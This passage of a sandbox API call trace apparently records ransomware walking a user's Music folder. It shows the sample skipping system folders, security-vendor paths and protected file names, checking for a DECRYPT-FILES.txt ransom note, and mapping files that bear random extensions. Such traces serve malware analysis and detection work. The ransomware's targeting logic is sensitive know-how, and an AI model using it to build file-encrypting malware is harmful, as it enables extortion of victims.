(lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="AhnLab") returned 0x0 [0185.815] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.815] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.815] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.816] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\0a16c9.tmp") returned 69 [0185.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0185.818] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.818] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.818] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\DECRYPT-FILES.txt") returned 76 [0185.818] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.818] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.818] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\*" [0185.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1f2dc0, ftCreationTime.dwHighDateTime=0x1d4c817, ftLastAccessTime.dwLowDateTime=0xf1756800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1756800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0185.818] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.818] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1f2dc0, ftCreationTime.dwHighDateTime=0x1d4c817, ftLastAccessTime.dwLowDateTime=0xf1756800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1756800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.818] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.818] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.819] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1756800, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1756800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1756800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.819] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.819] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.819] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.819] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.819] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.819] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.819] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.819] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.819] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0185.819] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\0a16c9.tmp" [0185.819] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.819] CloseHandle (hObject=0x0) returned 0 [0185.819] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.820] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e1c550, ftCreationTime.dwHighDateTime=0x1d4cd82, ftLastAccessTime.dwLowDateTime=0xd98bd450, ftLastAccessTime.dwHighDateTime=0x1d4cd04, ftLastWriteTime.dwLowDateTime=0xaf0d0a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xef0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="9w9ne up7xYdVEhiAPy.m4a.h2S13R", cAlternateFileName="9W9NEU~1.H2S")) returned 1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="DECRYPT-FILES.txt") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="autorun.inf") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="boot.ini") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="desktop.ini") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="ntuser.dat") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="iconcache.db") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="bootsect.bak") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="ntuser.dat.log") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="thumbs.db") returned -1 [0185.820] lstrcmpiW (lpString1="9w9ne up7xYdVEhiAPy.m4a.h2S13R", lpString2="Bootfont.bin") returned -1 [0185.820] lstrlenW (lpString="9w9ne up7xYdVEhiAPy.m4a.h2S13R") returned 30 [0185.820] lstrcmpiW (lpString1="h2S13R", lpString2="lnk") returned -1 [0185.820] lstrcmpiW (lpString1="h2S13R", lpString2="exe") returned 1 [0185.820] lstrcmpiW (lpString1="h2S13R", lpString2="sys") returned -1 [0185.820] lstrcmpiW (lpString1="h2S13R", lpString2="dll") returned 1 [0185.820] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.820] lstrlenW (lpString="9w9ne up7xYdVEhiAPy.m4a.h2S13R") returned 30 [0185.820] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0185.820] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="9w9ne up7xYdVEhiAPy.m4a.h2S13R" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a.h2S13R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a.h2S13R" [0185.820] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\9w9ne up7xYdVEhiAPy.m4a.h2S13R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\9w9ne up7xydvehiapy.m4a.h2s13r"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.821] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=61195) returned 1 [0185.821] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.821] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.824] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.824] CloseHandle (hObject=0x270) returned 1 [0185.824] CloseHandle (hObject=0x26c) returned 1 [0185.824] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.824] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31910e60, ftCreationTime.dwHighDateTime=0x1d4ca88, ftLastAccessTime.dwLowDateTime=0x5921a5d0, ftLastAccessTime.dwHighDateTime=0x1d4c924, ftLastWriteTime.dwLowDateTime=0xaf0f6ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14933, dwReserved0=0x0, dwReserved1=0x0, cFileName="A81STbCNKpkh.wav.yLJZ291", cAlternateFileName="A81STB~1.YLJ")) returned 1 [0185.824] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="DECRYPT-FILES.txt") returned -1 [0185.824] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="autorun.inf") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="boot.ini") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="desktop.ini") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="ntuser.dat") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="iconcache.db") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="bootsect.bak") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="ntuser.dat.log") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="thumbs.db") returned -1 [0185.825] lstrcmpiW (lpString1="A81STbCNKpkh.wav.yLJZ291", lpString2="Bootfont.bin") returned -1 [0185.825] lstrlenW (lpString="A81STbCNKpkh.wav.yLJZ291") returned 24 [0185.825] lstrcmpiW (lpString1="yLJZ291", lpString2="lnk") returned 1 [0185.825] lstrcmpiW (lpString1="yLJZ291", lpString2="exe") returned 1 [0185.825] lstrcmpiW (lpString1="yLJZ291", lpString2="sys") returned 1 [0185.825] lstrcmpiW (lpString1="yLJZ291", lpString2="dll") returned 1 [0185.825] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.825] lstrlenW (lpString="A81STbCNKpkh.wav.yLJZ291") returned 24 [0185.825] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0185.825] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="A81STbCNKpkh.wav.yLJZ291" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav.yLJZ291") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav.yLJZ291" [0185.825] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\A81STbCNKpkh.wav.yLJZ291" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\a81stbcnkpkh.wav.yljz291"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.826] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=84275) returned 1 [0185.826] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.826] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.826] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.826] CloseHandle (hObject=0x270) returned 1 [0185.826] CloseHandle (hObject=0x26c) returned 1 [0185.827] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.827] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0d0a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf0d0a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf0d0a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.827] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.827] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb2411e0, ftCreationTime.dwHighDateTime=0x1d4d40d, ftLastAccessTime.dwLowDateTime=0x22756a70, ftLastAccessTime.dwHighDateTime=0x1d4cc4f, ftLastWriteTime.dwLowDateTime=0xaf142e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfa92, dwReserved0=0x0, dwReserved1=0x0, cFileName="N 30hPEFiO2.m4a.ow02p", cAlternateFileName="N30HPE~1.OW0")) returned 1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="DECRYPT-FILES.txt") returned 1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="autorun.inf") returned 1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="boot.ini") returned 1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="desktop.ini") returned 1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="ntuser.dat") returned -1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="iconcache.db") returned 1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="bootsect.bak") returned 1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="ntuser.dat.log") returned -1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="thumbs.db") returned -1 [0185.827] lstrcmpiW (lpString1="N 30hPEFiO2.m4a.ow02p", lpString2="Bootfont.bin") returned 1 [0185.827] lstrlenW (lpString="N 30hPEFiO2.m4a.ow02p") returned 21 [0185.827] lstrcmpiW (lpString1="ow02p", lpString2="lnk") returned 1 [0185.827] lstrcmpiW (lpString1="ow02p", lpString2="exe") returned 1 [0185.827] lstrcmpiW (lpString1="ow02p", lpString2="sys") returned -1 [0185.827] lstrcmpiW (lpString1="ow02p", lpString2="dll") returned 1 [0185.827] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned 58 [0185.827] lstrlenW (lpString="N 30hPEFiO2.m4a.ow02p") returned 21 [0185.827] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\" [0185.827] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="N 30hPEFiO2.m4a.ow02p" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a.ow02p") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a.ow02p" [0185.827] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a.ow02p" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\n 30hpefio2.m4a.ow02p"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.828] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=64146) returned 1 [0185.828] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.828] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.829] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.829] CloseHandle (hObject=0x270) returned 1 [0185.829] CloseHandle (hObject=0x26c) returned 1 [0185.829] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.829] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51280f40, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0xaf201540, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf201540, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X7DdBKuwCUHgUBoP", cAlternateFileName="X7DDBK~1")) returned 1 [0185.829] lstrcmpW (lpString1="X7DdBKuwCUHgUBoP", lpString2=".") returned 1 [0185.829] lstrcmpW (lpString1="X7DdBKuwCUHgUBoP", lpString2="..") returned 1 [0185.829] lstrcatW (in: lpString1="X7DdBKuwCUHgUBoP", lpString2="\\" | out: lpString1="X7DdBKuwCUHgUBoP\\") returned="X7DdBKuwCUHgUBoP\\" [0185.829] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\", lpString2="X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Program Files") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch=":\\Windows") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Games\\") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\All Users") returned 0x0 [0185.829] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.830] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.830] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.830] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="AhnLab") returned 0x0 [0185.830] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.830] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0185.830] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.830] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\0a16c9.tmp") returned 86 [0185.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js 